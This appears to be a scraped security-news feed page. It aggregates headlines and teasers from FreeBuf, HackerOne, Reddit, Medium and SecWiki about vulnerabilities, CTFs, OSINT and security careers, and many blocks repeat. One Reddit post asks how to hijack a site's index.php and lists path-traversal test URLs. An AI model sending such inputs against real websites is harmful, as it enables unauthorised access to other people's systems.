    互金企业安全从业者柳伟杰在FreeBuf甲方社群第四场内部直播中担任主讲嘉宾,向大家分享互联网金融企业DevSecOps落地实践。
    信安标委发布《信息安全技术 互联网平台及产品服务隐私协议要求》(征求意见稿)
    《征求意见稿》规定互联网平台及产品服务隐私协议编制程序、具体内容、发布形式,增加隐私协议的可读性、透明性,以及处理隐私协议相关的争议纠纷等。
    警惕!KillNet恐于5月30日对意大利发动大规模攻击
    亲俄黑客组织KillNet于5月30日对意大利政府发出威胁,称将对其发动史无前例的大规模攻击。
    EnemyBot恶意软件增加了针对VMware等关键漏洞的攻击
    EnemyBot背后的组织Keksec正在积极开发该恶意软件。
    微软发现Android 预装应用受高危漏洞影响
    微软安全研究团队披露了在 mce Systems 提供的 Android Apps 移动服务框架中的严重安全漏洞,多个运营商的默认预装应用受影响。
    非法获利5.68亿美元,37岁欺诈者被判四年
    Telusma因在跨国网络犯罪组织运营的Infraud卡片门户上出售、使用被盗和受损信用卡、个人信息、财务信息而被判处四年有期徒刑。
    路透社:英国脱欧泄密网站幕后推手与俄罗斯黑客有关
    “Very English Coop d'Etat”网站的设立是为了发布英国脱欧支持者的私人电子邮件。
    世融能量:量子密码和安全密不可分 | 网安新势力SOLO发布季
    量子技术如何应用于安全领域?网安新势力大会SOLO发布季告诉你!
  • Open

    Users who are restricted to use the application because of a "Waiting List" are able to get access to the Beta Application by bypassing the waitlist
    Alohi disclosed a bug submitted by darkknight4688: https://hackerone.com/reports/1494308
  • Open

    Pen #004: Linux Basics (Part 1)
    No content preview
    AWS IAM Exploitation Techniques
    No content preview
    Anatomy Of Spring4Shell CVE-2022–22965
    No content preview
  • Open

    Pen #004: Linux Basics (Part 1)
    No content preview
    AWS IAM Exploitation Techniques
    No content preview
    Anatomy Of Spring4Shell CVE-2022–22965
    No content preview
  • Open

    Pen #004: Linux Basics (Part 1)
    No content preview
    AWS IAM Exploitation Techniques
    No content preview
    Anatomy Of Spring4Shell CVE-2022–22965
    No content preview
  • Open

    Active Directory Purple Teaming
    This repository is aimed at sharing the cliff notes for performing Red Teaming of Active Directory System combined with Detection… Continue reading on Medium »

  • Open

    What are the Implications of an automation tool, using PsExec to execute commands (of any kind) on client machines, from a domain controller?
    I use ConnectwiseAutomate (CWA) to manage my environment. Today I was parsing through Sysmon logs, and found that CWA is using PsExec, to execute commands on client machines, from my domain controller. The commands I've seen it execute are benign in general. And seem to be "normal/built-in" processes (because they're not any i created) But it makes me uncomfortable that this is happening in general. (I've already created a post asking how to stop CWA from doing this.) It makes me uncomfortable because I go out of my way to practice principal of least privilege. As I'm generally aware of PTH attacks and similar. e.g., I never log onto member servers or workstations as domain admin. I have separate accounts for the administration of standard member servers ( in other words, non-do…
    Home Server
    Hey everyone, I woulk like to set a home server in a raspberry pie 400 or even an older computer. Do you know any step by step guide for a novice person to start with? A OS GUI is mandatory. Thanks in advance submitted by /u/fmsferreira [link] [comments]
  • Open

    CRYPTOCURRENCY OSINT
    submitted by /u/saqfi [link] [comments]
    GitHub - Orange-Cyberdefense/arsenal: Arsenal is just a quick inventory and launcher for hacking programs
    submitted by /u/saqfi [link] [comments]
    JPG to Malware
    submitted by /u/saqfi [link] [comments]
    ForceAdmin : Create infinate #UAC prompts forcing a user to run as admin.
    submitted by /u/saqfi [link] [comments]
    grsecurity - Tetragone: A Lesson in Security Fundamentals
    submitted by /u/buherator [link] [comments]
  • Open

    P3 Bug in Just 2 Minute
    Hey Hello, Security guys & Hacker Thank you for your support. Continue reading on Medium »
    DOMAIN ADMIN Compromise in 3 HOURS
    Hi everyone; I hope you enjoyed my previous blog post on “How I obtained Admin access in 30 minutes” — so today I am bringing you another… Continue reading on Medium »
    Biblioteca Walkthrough:THM
    In the past few days, I am recharging myself by trying my hands at different rooms present in tryhackme TryHackMe. So thought why not just… Continue reading on Medium »
    Hall of Fame Vice Media ? hacking while sleepy…
    Hello guys, actually this is the case in 2021 but only now had time to write. So… have you ever heard of Vice media? one of the largest… Continue reading on Medium »
  • Open

    SecWiki News 2022-05-29 Review
    今日暂未更新资讯~ 更多最新文章,请访问SecWiki
  • Open

    SecWiki News 2022-05-29 Review
    今日暂未更新资讯~ 更多最新文章,请访问SecWiki
  • Open

    Lo stile (interdisciplinare) di OSINT
    Sapete già — vi ho già assillato abbastanza in passato — che uno dei pilastri della mia proposta di Teoria Generale per l’Intelligence… Continue reading on Medium »
    SPY NEWS: 2022 — Week 21
    Summary of the espionage-related news stories for the Week 21 (22–29 May) of 2022. Continue reading on Medium »
    Video verification: Sent to Chinese quarantine camp
    Video verification article on footage showing Chinese citizens sent off to quarantine camps #OSINT #verification by @Techjournalisto Continue reading on Medium »
  • Open

    DOMAIN ADMIN Compromise in 3 HOURS
    Hi everyone; I hope you enjoyed my previous blog post on “How I obtained Admin access in 30 minutes” — so today I am bringing you another… Continue reading on Medium »
  • Open

    CYBERSOC Information Technology Library Blog
    submitted by /u/cybersocdm [link] [comments]
    Killing The Bear - Cybercrime repo, Threat Actors, Campaigns, Malware, IOCs
    ​ Killing The Bear Hi everyone! I want to share with you my new gitbook/repo about Threat Actors: Killing The Bear. Very useful for SOC, CTI and Threat Hunting teams. In it you can find: - Threat Actors - Malware - Tools - TTPs - IOCs - Summary (executive) - Wallets - Timeline - Relationships - Etc... Yesterday I published the "Killnet" category, you can find it here: Killnet - Actor Gradually more categories are being added with more intel. I hope it will be useful to you or your team. Thank you! submitted by /u/J-Testa [link] [comments]
  • Open

    Learning Linux & InfoSec Principles Using OverTheWire’s Bandit — Part 4
    No content preview
    Hacking GraphQL — Part 1
    No content preview
    Bypass the Firewall with SSH Tunnelling
    No content preview
    CyberStarters CTF — Gunship
    No content preview
  • Open

    Learning Linux & InfoSec Principles Using OverTheWire’s Bandit — Part 4
    No content preview
    Hacking GraphQL — Part 1
    No content preview
    Bypass the Firewall with SSH Tunnelling
    No content preview
    CyberStarters CTF — Gunship
    No content preview
  • Open

    Learning Linux & InfoSec Principles Using OverTheWire’s Bandit — Part 4
    No content preview
    Hacking GraphQL — Part 1
    No content preview
    Bypass the Firewall with SSH Tunnelling
    No content preview
    CyberStarters CTF — Gunship
    No content preview
  • Open

    Heap BINARY EXPLOITATION w/ Matt E! (Tcache Attack)
    submitted by /u/soupcreamychicken [link] [comments]
    REcon is a computer security conference with a focus on reverse engineering and advanced exploitation techniques. It is held annually in Montreal, Canada.
    https://recon.cx/ submitted by /u/soupcreamychicken [link] [comments]
  • Open

    FreeBuf早报 | 淘宝禁售修改伪造IP等软件与服务;曝通用汽车受黑客攻击
    淘宝平台发布《淘宝平台违禁信息管理规则》,明确禁止销售IP修改/代理/伪造的软件及服务。此次规则变更将于2022年6月3日正式生效。
    逻辑越权漏洞
    部分内容来自这篇,仅作为自己学习的记录还有跟着迪总所学水平越权和垂直越权概述水平越权:指攻击者尝试访问与他拥有相同权限的用户资源。垂直越权:低权限用户尝试访问高权限用户的资源。(例如一个用户的个人信息管理页是 user.php,而管理员管理所有用户信息的页面是 manageuser.php, 但管理页面没有相关的权限验证,导致任何人输入管理页面地址都可以访问)漏洞产生原因越权漏洞形成的原因是后台使
  • Open

    My Photo Investigation Toolkit
    Search by photo Extracting metadata Photoforensic tools Fact-checking tools https://start.me/p/0PgzqO/photo-osint Bye submitted by /u/saqfi [link] [comments]
    Sans Memory forensic Cheat Sheet
    https://github.com/AndrewRathbun/DFIRMindMaps/tree/main/MemoryForensics/SANSMemoryForensicsCheatSheet Complete Cheatsheet submitted by /u/saqfi [link] [comments]
  • Open

    A security vulnerability in Git that can lead to arbitrary code execution (2018)
    Article URL: https://devblogs.microsoft.com/devops/announcing-the-may-2018-git-security-vulnerability/ Comments URL: https://news.ycombinator.com/item?id=31547175 Points: 1 # Comments: 0

  • Open

    Vulnerable machines for learning
    Are there any vulnerable systems for learning, specifically API? I’ve seen everything but. But figure there has to be some? submitted by /u/networkalchemy [link] [comments]
    Advice On Hashcat Not Detecting AMD GPU
    Hello, I was running hashcat until I realized that I was using my CPU and not my GPU. I have been spending a good amount of time on the internet for why my hashcat is not detecting my GPU but struggling to find an answer. I am dual booting PopOs & Kali so I am not running Kali in a VM. My GPU is a Radeon Pro WX 5100. I tested to see if my GPU is actually being used by entering sudo radeontop and ran glxgears to see if it is being picked up. Below is the results found from running sudo radeontop Graphics pipe 3.33% │ ──────────────────────────────────── Event Engine 0.00% │ Vertex Grouper + Tesselator 0.00% │ Texture Addresser 3.33% │ Shader Export 3.33% │ Sequencer Instruction Cache 0.00% │ Shader Interpolator 3.33% │ Scan Converter 3.33% │ Primitive Assembly 0.00% │ Depth Block 3.33% │…
    creating a pentest network on Virtualbox
    I have a windows server VM and a Kali linux Vm on Virtualbox , the windows server has an FTP server which I will try to hack into . Should I use an internal network on the both vms or use NAT on the VMS and set up DHCP on windows server and then connect both VMS to that . I want to make sure that both vms are on a network that is isolated from my home network so I can run NMAP and use metasploit etc . I had used the internal network but the vms would not get internet access and I was not sure why ? any help will much appreciated . submitted by /u/ghostexploitelite [link] [comments]
    Recommended Emulator for Android Application Pentesting ?
    What is your favourite Emulator for pentesting Android applications ? Which proxy (ZAP, Burp, etc.) would you recommend for intercepting traffic ? submitted by /u/aim4r [link] [comments]
  • Open

    What data can teach us about Russian propaganda
    Looking at state news agencies’ reporting on the war shows how propaganda works in a novel way. Continue reading on Medium »
    FBI Reveals Buffalo Mass Shooter Influenced by “Sandman.” Who the hell is that?
    Who platforms those indoctrinating America’s male youth to commit mass murder? Continue reading on Medium »
    My Email Investigation Toolkit
    Verification tools (SMTP, WHOIS, Headers) Email tracking, logging and geolocation Phishing email, permutation Identification email user… Continue reading on Medium »
    Searching for The White City — OSINT Challenge 23
    @Sector035 shared a new OSINT quiz with us. The objective was simple. We had to figure out where… Continue reading on Medium »
    They’re better than you at Google Maps
    I didn’t know you could use the app like this. Continue reading on Medium »
  • Open

    Domain Escalation: Unconstrained Delegation
    Introduction Post-Windows 2000, Microsoft introduced an option where users could authenticate to one system via Kerberos and work with another system. This was made possible The post Domain Escalation: Unconstrained Delegation appeared first on Hacking Articles.
    Domain Escalation: Unconstrained Delegation
    Introduction Post-Windows 2000, Microsoft introduced an option where users could authenticate to one system via Kerberos and work with another system. This was made possible The post Domain Escalation: Unconstrained Delegation appeared first on Hacking Articles.
  • Open

    Step by step guide of setting up SSL/TLS for a server and client
    submitted by /u/Hakky54 [link] [comments]
    Building a Threat Intelligence Feed using the Twitter API and a bit of code
    submitted by /u/Robbedoes_ [link] [comments]
    Understanding CVE-2022-22972 (VMWare Workspace One Access Auth Bypass)
    submitted by /u/Mempodipper [link] [comments]
    How to secure Kubernetes Deployment
    submitted by /u/antfigunio [link] [comments]
    Rikkei Finance Hack: Explained
    submitted by /u/viagumowl [link] [comments]
  • Open

    CVE-2022-28738: Double free in Regexp compilation
    Internet Bug Bounty disclosed a bug submitted by piao: https://hackerone.com/reports/1549636 - Bounty: $4000
  • Open

    Window Registry Forensics Cheatsheet
    submitted by /u/saqfi [link] [comments]
    Master and phd or my job
    I have got grant master and phd degree in USA in cybersecurity, I already have a kind a good job right now, should i take the grant or stay in my job. ** I cant do both. submitted by /u/1328262 [link] [comments]
  • Open

    My First Bounty Reward For low hanging fruit
    Hello Guys, I am Sanath Vyas R working as Web Penetration Tester & Trainer in RVR Security Solutions. Continue reading on Medium »
    WardenSwap is partnering up with Valix Consulting to strengthen the security support
    On the 14th of March, WardenSwap has to launch a Bug Bounty Program with a reward of up to $100,000 USD on Immunefi. Continue reading on WARDEN Official »
  • Open

    SecWiki News 2022-05-28 Review
    今日暂未更新资讯~ 更多最新文章,请访问SecWiki
  • Open

    SecWiki News 2022-05-28 Review
    今日暂未更新资讯~ 更多最新文章,请访问SecWiki
  • Open

    Empire Breakout靶机渗透
    挺简单的一个靶机,没有太多的难点,考验的还是思路和仔细认真!
    《网络安全标准实践指南—Windows 7操作系统安全加固指引》之安全配置加固的安全审计(三)
    本文根据实践指南内容,从实际出发对windows 7操作系统安全配置加固的安全审计进行实际加固作业。
  • Open

    How to download a full folder from a website that uses Workers.dev?
    Guys, I've being trying to download courses from this website https://medvideos.su/cursos-gratuitos As you can see, It opens folders full os links, that needs to be clicked one by one... I've tried to use Link extraction + Mass downloader extensions, but it simply does not get the links needed. submitted by /u/jopelira [link] [comments]
    Around 1.4+ TB of data. (Mostly chinese)
    https://od.lezi.me/ ​ Few folders had NSFW too. submitted by /u/sematrades [link] [comments]

  • Open

    Questions about the field!
    Hello r/computerforensics! I am fresh in the IT field and have an Associates degree in Network Security and Computer Forensics! I am in the position to work towards my Bachelors utilizing my new jobs professional development program and I just have a few questions. I live in a rural area but want to pursue this field. I don’t have the ability (due to certain life choices) to move very far. I would like to know the capability to work remote in this field. I have 4 options for a focus in a degree. While 2 interest me, I’d love to hear from people in the field. The focus areas: 1. General (cloud/mobile security, security monitoring/incident response) 2. Cyber Forensics 3. Information Assurance 4. Cybersecurity Analyst. Final question! Do you find that this field is rewarding? Income doesn’t so much matter, I’m already well above what the average of my state is. I suppose that I just want to know if this field is worth it over a general CIS degree. Thanks for anyone who is willing to answer in any capacity! Have a great weekend! submitted by /u/GullibleSquid [link] [comments]
  • Open

    Whoa now, hold up — CRTP
    Wait a minute, hold up. Can I do that with PowerShell? Continue reading on Medium »
    HackMyVM — Djinn
    Writeup (Español) Continue reading on Medium »
    Azure Container Instance Distributed Operations
    Azure Container Instances Distributed Operations (acido CLI) for Red Team Operations through Azure Cloud. Continue reading on Medium »
  • Open

    Opticon USA technical documents and software
    submitted by /u/j4eo [link] [comments]
    large directory of audio files + video files
    https://www.mboxdrive.com/ you can upload your own too: https://mailboxdrive.com/upload/ submitted by /u/SinisterYT06 [link] [comments]
  • Open

    Serious Dos Vulnerability
    Article URL: https://www.theoreticalstructures.io/2022/05/27/the-unbearable-lightness-of-web-vulnerabilities/ Comments URL: https://news.ycombinator.com/item?id=31533658 Points: 2 # Comments: 0
  • Open

    War in Ukraine / May 26
    Russia is not ready for negotiations Continue reading on Medium »
    A new Coordinate System — OSINT Challenge 22
    After a very long break from my blogs I’m back with a standard Quiztime. Shared by contributor @kollege. The objective was simple. We had… Continue reading on Medium »
    My Photo Investigation Toolkit
    Search by photo Extracting metadata Photoforensic tools Fact-checking tools Continue reading on Medium »
  • Open

    Can an IP Address be taken from you?
    No one technically owns their allotted IP addresses, right? Are there different parts of the custody chain that could act against an IP address "owner"? Like DNS, ultimately ICANN is the authority and then a domain registrar serves as a middleman. Two levels of authority that can act against your "ownership" of a domain. submitted by /u/navinpr0 [link] [comments]
    How to take control of the index.php file to modify the page using Traversal and IDOR?
    Hello, I've tried with: http://example.com/index.php?file=view.php http://example.com/index.php?file=index.php http://example.com/index.php?file=../index.php http://example.com/index.php?file=..\index.php ​ Can I have some guidance? ​ Thanks submitted by /u/Traditional_Bird_877 [link] [comments]
  • Open

    GhostTouch: Targeted Attacks on Touchscreens without Physical Touch (pdf, paper)
    submitted by /u/buybank [link] [comments]
    AWS universal rate-limiter bypass
    submitted by /u/thyphoous [link] [comments]
    How Defenders Can Hunt for Malicious JScript Executions
    submitted by /u/Wietze- [link] [comments]
    npm security update: Attack campaign using stolen OAuth tokens
    submitted by /u/mstromich [link] [comments]
  • Open

    SecWiki News 2022-05-27 Review
    Ghostrings is a collection of Ghidra scripts for recovering string definitions i by BaCde IEEE S&P 2022 云端报道(4) by ourren MANDIANT 网络威胁情报分析人员核心能力框架 by Avenger 更多最新文章,请访问SecWiki
  • Open

    SecWiki News 2022-05-27 Review
    Ghostrings is a collection of Ghidra scripts for recovering string definitions i by BaCde IEEE S&P 2022 云端报道(4) by ourren MANDIANT 网络威胁情报分析人员核心能力框架 by Avenger 更多最新文章,请访问SecWiki
  • Open

    How to Report Buggs and claim your bounty?
    Steps: Continue reading on SageMaster »
    python hash table Data Structures & Algorithms Python3
    Code : Continue reading on Medium »
  • Open

    FreeBuf周报 | VMware被半导体巨头博通收购;新型Zoom漏洞出现
    半导体巨头博通610亿美元收购虚拟机巨头、云计算公司VMware。
    CHAOS勒索病毒分析
    Chaos 是 2021 年开发的一种新的勒索软件, Chaos是一种仍在开发中的勒索软件,在地下黑客论坛上提供,在地下黑客论坛上提供,在那里它被宣传为Ryuk的新版本。
    【安全科普】今天你被社工了吗?
    内附19条防社工秘籍
    2021 Owasp top 10 逐个击破--A03:2021 – Injection
    Owasp top 10 最新排名最新的2021 top 10已经出来了,我们从A01开始进行一次详细解读,本系列会详细介绍各个漏洞的变化与内容,并会着重介绍新增的漏洞情况。A03:2021–注射因素
    RSAC 2022举办在即,创新沙盒大赛谁将成最大赢家?
    2022年6月6日,RSAC 2022创新沙盒大赛积极举办,哪家企业能够成为最后赢家,哪条赛道又将迎来新一轮的火热?
    新暗网市场Industrial Spy或已加入勒索软件攻击大军
    近日,有观察发现,新暗网市场Industrial Spy正在对受害者设备进行加密并尝试推出自己的勒索计划。
    谷歌关闭了两家俄罗斯ISP的缓存服务器
    两家俄罗斯互联网服务提供商(ISP)收到Google的通知,称其网络上的全球缓存服务器已被禁用。
    OAS 平台受关键 RCE 和 API 访问漏洞的影响
    威胁分析专家披露 OAS 平台存在安全漏洞,漏洞可导致设备访问、拒绝服务和远程代码执行受到严重影响。
    PoC代码已公布,这个 VMware auth 高危漏洞需尽快修补
    Horizo​​n3 安全研究人员在26日发布了针对CVE-2022-22972漏洞的概念验证 (PoC) 漏洞利用和技术分析。
    Windows全局代理
    在买的一些V.P.S上做扫描的时候,有可能会触发到V.P.S厂商(搬瓦工、Vultr的都有遇到过)的安全机制(如DDoS),将我们的V.P.S停机。做好全局代理的情况下,我们就可以在自己的电脑上做些扫
  • Open

    Firewall Evasion Techniques using Nmap
    Introduction Continue reading on InfoSec Write-ups »
  • Open

    Firewall Evasion Techniques using Nmap
    Introduction Continue reading on InfoSec Write-ups »
  • Open

    Firewall Evasion Techniques using Nmap
    Introduction Continue reading on InfoSec Write-ups »
  • Open

    Control character filtering misses leading and trailing whitespace in file and folder names
    Nextcloud disclosed a bug submitted by david_h1: https://hackerone.com/reports/1402249 - Bounty: $100
    Notification implicit PendingIntent in com.nextcloud.client allows to access contacts
    Nextcloud disclosed a bug submitted by qj_test: https://hackerone.com/reports/1161401 - Bounty: $250
  • Open

    Unfixed GMP Type Confusion in PHP <= 5.6.40
    Authors: Alexey Moskvin, Daniil Sadyrin https://github.com/CFandR-github/PHP-binary-bugs/blob/main/GMP_type_conf_unserialize/GMP_type_conf_advisory.md Requirements: PHP <= 5.6.40 Compiled with: ...
    从滥用 HTTP hop by hop 请求头看 CVE-2022-1388
    作者:Y4er 原文链接:https://y4er.com/post/from-hop-by-hop-to-cve-2022-1388/ 前言 最近爆出来的bigip的CVE-2022-1388漏洞,涉及到一个知识点就是hop by hop,对这个东西没了解过,所以有了此文。 回顾CVE-2021-22986 CVE-2021-22986原理是因为apache和jetty之间的鉴权不当导致的...
  • Open

    Unfixed GMP Type Confusion in PHP <= 5.6.40
    Authors: Alexey Moskvin, Daniil Sadyrin https://github.com/CFandR-github/PHP-binary-bugs/blob/main/GMP_type_conf_unserialize/GMP_type_conf_advisory.md Requirements: PHP <= 5.6.40 Compiled with: ...
    从滥用 HTTP hop by hop 请求头看 CVE-2022-1388
    作者:Y4er 原文链接:https://y4er.com/post/from-hop-by-hop-to-cve-2022-1388/ 前言 最近爆出来的bigip的CVE-2022-1388漏洞,涉及到一个知识点就是hop by hop,对这个东西没了解过,所以有了此文。 回顾CVE-2021-22986 CVE-2021-22986原理是因为apache和jetty之间的鉴权不当导致的...
  • Open

    USB Device Redux, with Timelines
    If you ask DFIR analysts, "What is best in life?", the answer you should hear is, "...creating timelines!" After all, industry luminaries such as Andrew said, "Time is the most important thing in life, and timelines are one of the most useful tools for investigation and analysis.", and Chris said, "The timeline is the central concept of all investigative work." My previous blog post addressed USB-connected devices, but only from the perspective of Windows Event Logs. In this blog post, I wanted to include data from the Registry, incorporated in a timeline so that the various data sources could be viewed through a common lens, in a single pane of glass.  I stated by using wevtutil.exe to export current copies of the five Windows Event Logs to a central location. I then used reg.exe to do…

  • Open

    Physics related OD
    http://www.w2agz.com/Library/ submitted by /u/inoculatemedia [link] [comments]
    Movies and TV
    submitted by /u/owenthewizard [link] [comments]
    Movies-TV-Anime
    http://23.147.64.113/ submitted by /u/SeniorAlbatross [link] [comments]
  • Open

    Full read SSRF in flyte-poc-us-east4.uberinternal.com
    Uber disclosed a bug submitted by ian: https://hackerone.com/reports/1540906 - Bounty: $2000
    [Urgent] Critical Vulnerability [RCE] on vulnerable to Remote Code Execution by exploiting MS15-034, CVE-2015-1635
    U.S. Dept Of Defense disclosed a bug submitted by ashutosh7: https://hackerone.com/reports/469730
    Read Other Users Reports Through Cloning
    U.S. General Services Administration disclosed a bug submitted by hollaatm3: https://hackerone.com/reports/1505609
  • Open

    (Classical Cryptography with Python) Part 1
    Hey everyone, welcome back to my blog. Today I want to demonstrate about cryptographic concept with Python programming language. Lets kick… Continue reading on Medium »
    CVE-2022–29333 Privilege Escalation Power Director 14 — Exploiting GUI Weakness
    A little while ago I saw a video of a PoC of CVE-2022–0354 where the researcher found a vulnerability in a native application of his… Continue reading on Medium »
    WiFi Hacking | Start hacking WiFi with few simple steps ;)
    This article is divided into 2 parts basic steps required to hack a wireless network Continue reading on Medium »
  • Open

    Scan email inbox to find phishing
    Hi, I am managing 500 employees' inboxes(Microsoft). Are there any solutions that can help me scan all the inboxes daily to discover if there is any missing phishing email that sits inside someone's inbox? submitted by /u/Calm_Scene [link] [comments]
    DDoS Attacks on OT
    Hi guys, Sorry if this is not a good place for this question but I was wondering if you could recommend me some literature, articles and stuff like that regarding DDOS attacks on OT( Operational Technology)? I have to write a paper about that topic but can't find any information about it. submitted by /u/PuzzleheadedYamk [link] [comments]
    EU Control
    Hey guys, I have a question which has interested me for a few days now. This new possible directive unfortunately affects not only these nasty ones, but the entire civilian population. If the EU "chat control" would come into force, how could / would you protect yourself from it? Thank u in advance! Stay healthy submitted by /u/D3ATHB1RD [link] [comments]
    What should I do?
    Hey! HS Junior here. I am currently trying to decide on what I want to do as a career, and have narrowed it down to either Cybersecurity or Quant Finance. Would an undergrad degree in Data Science be good enough for cyber security employers, or should I do a degree in CS? Specifically, I was thinking of doing DS just in case I decide to pursue quant or risk analysis for a wall street firm instead, in which case a mathematics/DS background would fair better than a CS one. Thanks! submitted by /u/TakeTheWs [link] [comments]
    Improving penetration test reporting templates
    Hi, I'm on my way automating reporting and I was wondering if you can recommend me some examples of good and yet simple penetration test templates which include - confidentiality, responsibility, summary, scope of systems etc (the stuff before and after the vulnerabilities). I'm also looking for new layout and design ideas I would like to modernize some of the graphs and the tables I use. Will appreciate any tips, videos or sources. So far I've found TCMS - Findings Report and public-pentesting-reports in github. Thanks! submitted by /u/tryingtoworkatm [link] [comments]
    What is a cheap/easy WiFi deauth attack detection?
    Without going too big (eg set up of full blown SIEM, buying enterprise grade wifi security appliance etc), what's an easy way to detect deauth attacks. I have limited syslogs from the WAPs, but can set up a Mac/Linux/Windows with wifi card or a RPi. I only need to monitor for a limited period in the immediate term, so it's cool to set up something sub optimal and temporary if it does the job. I can follow an idiot's guide for something moderately complex, but preference is as simple as possible (eg, preconfigured RPi image or a single application with 2 steps to install and configure). In essences, I'd like something that can detect deauth frames, give me a timestamp and originating MAC, either to logs or email alert. Budget is like 8 hours labour, and 200€. submitted by /u/homelaberator [link] [comments]
  • Open

    Chrome 103 Beta: Early Navigation Hints, a Host of Completed Origin Trials, and More
    Unless otherwise noted, changes described below apply to the newest Chrome beta channel release for Android, Chrome OS, Linux, macOS, and Windows. Learn more about the features listed here through the provided links or from the list on ChromeStatus.com. Chrome 103 is beta as of May 26, 2022. You can download the latest on Google.com for desktop or on Google Play Store on Android. Early Hints for Navigation Chrome now supports the 103 Early Hints HTTP response code for navigation. (Note: the correspondence with the Chrome release number is a coincidence.) When a 103 response includes or other link headers Chromium tries to preload (and/or preconnect, prefetch) specified resources before the final response is received. This gives web developers a way to optimize core web…
  • Open

    Bug Bounty FIRE Goals
    Using bug bounty along side full-time employment is a solid means to attain FIRE. (Financial Independence/Retire Early) Continue reading on Medium »
    AlbusSec:- Penetration-List 07 Cross-Side-Request-Forgery(CSRF) — Sample
    Hi Information Security folk, I hope you are well and doing great in your life, Also I hope You liked my previous article about… Continue reading on Medium »
    Social Media Take Over = Easy Money
    If you are alive like me, you probably also enjoy the idea of easy money. Continue reading on Techiepedia »
    How an Open Redirection Leads to an Account Takeover?
    Hey folks,  I’m here to share one of my old finding. In which i found a unique way of an open redirection which leads to an account… Continue reading on InfoSec Write-ups »
    How I hacked Harvard and Cambridge | The anti-wayback method
    This blog is a continuation of my previous one. If you haven't read that, please do so to understand the entire context: Continue reading on Medium »
  • Open

    Career Advice
    Hello everyone, I've just finished uni with a Bsc Cybersecurity (United Kingdom). We've covered every domain you can think off. As you know it's the most important time for us to think about what career or domain in cybersecurity we want to specialise in. I've secured a role within OTT investigation (over the top content)/illegal streaming of content; I know it's early but I like to plan ahead for my future. However, I've worked as a tech support engineer for medical companies I didn't enjoy it one bit ( I've been through hell desk). The issue is that, the difference between these two domains are vastly different but may abstractly supplement cybersecurity or DF roles that I may get in the future, I'm quite conflicted in terms career pivoting and interests. I've also done alot of DF mainly on windows, chrome and mozilia using Autopsy and Encase processor etc. I really enjoy investigating into things. I was hoping people within DF could share some insight into what some of your duties are and I'm aware of CSAM in some of the DF roles especially within LE submitted by /u/Suspicious-Choice-92 [link] [comments]
  • Open

    Operational Methodologies of Cyber Terrorist Organization “Transparent Tribe”
    No content preview
    Penetration Testing Benefits
    No content preview
    How an Open Redirection Leads to an Account Takeover?
    No content preview
    Secure Code Review -1 | Cheat sheet For Security Vulnerability In Python — Injection Flaws
    Based on OWASP Top-10 Vulnerabilities. This time we are looking for secure coding bugs related to Injection Flaws Continue reading on InfoSec Write-ups »
    Module-2 | Introduction -Pentesting & Bypassing AWS/Azure/GCP Cloud WAF Fun & Profit
    Q. What is Core Rule Set & why it is utilized by all the cloud WAFs? A. We will try to understand more about the core rule set along with… Continue reading on InfoSec Write-ups »
    Module-3 | Introduction -Pentesting & Bypassing AWS/Azure/GCP Cloud WAF Fun & Profit
    1. Setting up Vulnerable Application For AWS WAF Continue reading on InfoSec Write-ups »
  • Open

    Operational Methodologies of Cyber Terrorist Organization “Transparent Tribe”
    No content preview
    Penetration Testing Benefits
    No content preview
    How an Open Redirection Leads to an Account Takeover?
    No content preview
    Secure Code Review -1 | Cheat sheet For Security Vulnerability In Python — Injection Flaws
    Based on OWASP Top-10 Vulnerabilities. This time we are looking for secure coding bugs related to Injection Flaws Continue reading on InfoSec Write-ups »
    Module-2 | Introduction -Pentesting & Bypassing AWS/Azure/GCP Cloud WAF Fun & Profit
    Q. What is Core Rule Set & why it is utilized by all the cloud WAFs? A. We will try to understand more about the core rule set along with… Continue reading on InfoSec Write-ups »
    Module-3 | Introduction -Pentesting & Bypassing AWS/Azure/GCP Cloud WAF Fun & Profit
    1. Setting up Vulnerable Application For AWS WAF Continue reading on InfoSec Write-ups »
  • Open

    Operational Methodologies of Cyber Terrorist Organization “Transparent Tribe”
    No content preview
    Penetration Testing Benefits
    No content preview
    How an Open Redirection Leads to an Account Takeover?
    No content preview
    Secure Code Review -1 | Cheat sheet For Security Vulnerability In Python — Injection Flaws
    Based on OWASP Top-10 Vulnerabilities. This time we are looking for secure coding bugs related to Injection Flaws Continue reading on InfoSec Write-ups »
    Module-2 | Introduction -Pentesting & Bypassing AWS/Azure/GCP Cloud WAF Fun & Profit
    Q. What is Core Rule Set & why it is utilized by all the cloud WAFs? A. We will try to understand more about the core rule set along with… Continue reading on InfoSec Write-ups »
    Module-3 | Introduction -Pentesting & Bypassing AWS/Azure/GCP Cloud WAF Fun & Profit
    1. Setting up Vulnerable Application For AWS WAF Continue reading on InfoSec Write-ups »
  • Open

    Codenotary Adds Background Vulnerability Scanning
    Article URL: https://thenewstack.io/codenotary-adds-background-vulnerability-scanning/ Comments URL: https://news.ycombinator.com/item?id=31522042 Points: 1 # Comments: 0
    Tell HN: Mitigate Security Vulnerability in Tails 5.0
    Mitigate Security Vulnerability in Tails 5.0 : https://tails.boum.org/security/prototype_pollution/index.en.html >We recommend that you stop using Tails until the release of 5.1 (May 31) if you use Tor Browser for sensitive information (passwords, private messages, personal information, etc.). >Security level You can change the security level of Tor Browser to disable browser features as a trade-off between security and usability. For example, you can set the security level to Safest to disable JavaScript completely. The security level is set to Standard by default which gives the most usable experience. about:config set; javascript.enabled to false javascript.options.asmjs to false Comments URL: https://news.ycombinator.com/item?id=31514412 Points: 2 # Comments: 0
  • Open

    War in Ukraine / May 25
    95% of the Luhansk region are occupied Continue reading on Medium »
    How to install anon OS Tails on USB-drive?
    Today we will learn how to install a private OS TAILS — one of the Linux distributions based on Debian with maximum security. Continue reading on Medium »
  • Open

    We Love Relaying Credentials: A Technical Guide to Relaying Credentials Everywhere
    submitted by /u/mgalloar [link] [comments]
    Fully automated threat hunting. Too good to be true?
    https://medium.com/cybersecurityspace/fully-automated-threat-hunting-too-good-to-be-true-88e39fe0f13e Can we get to a point when fully automated threat hunting is possible in the indefinite future? submitted by /u/Cultural_Budget6627 [link] [comments]
    GitHub - sailay1996/CdpSvcLPE: Windows Local Privilege Escalation via CdpSvc service (Writeable SYSTEM path Dll Hijacking)
    submitted by /u/soupcreamychicken [link] [comments]
  • Open

    SecWiki News 2022-05-26 Review
    今日暂未更新资讯~ 更多最新文章,请访问SecWiki
  • Open

    SecWiki News 2022-05-26 Review
    今日暂未更新资讯~ 更多最新文章,请访问SecWiki
  • Open

    FreeBuf甲方群话题讨论 | 你会给国产化安全产品机会吗?对Sohu钓鱼邮件有何看法?
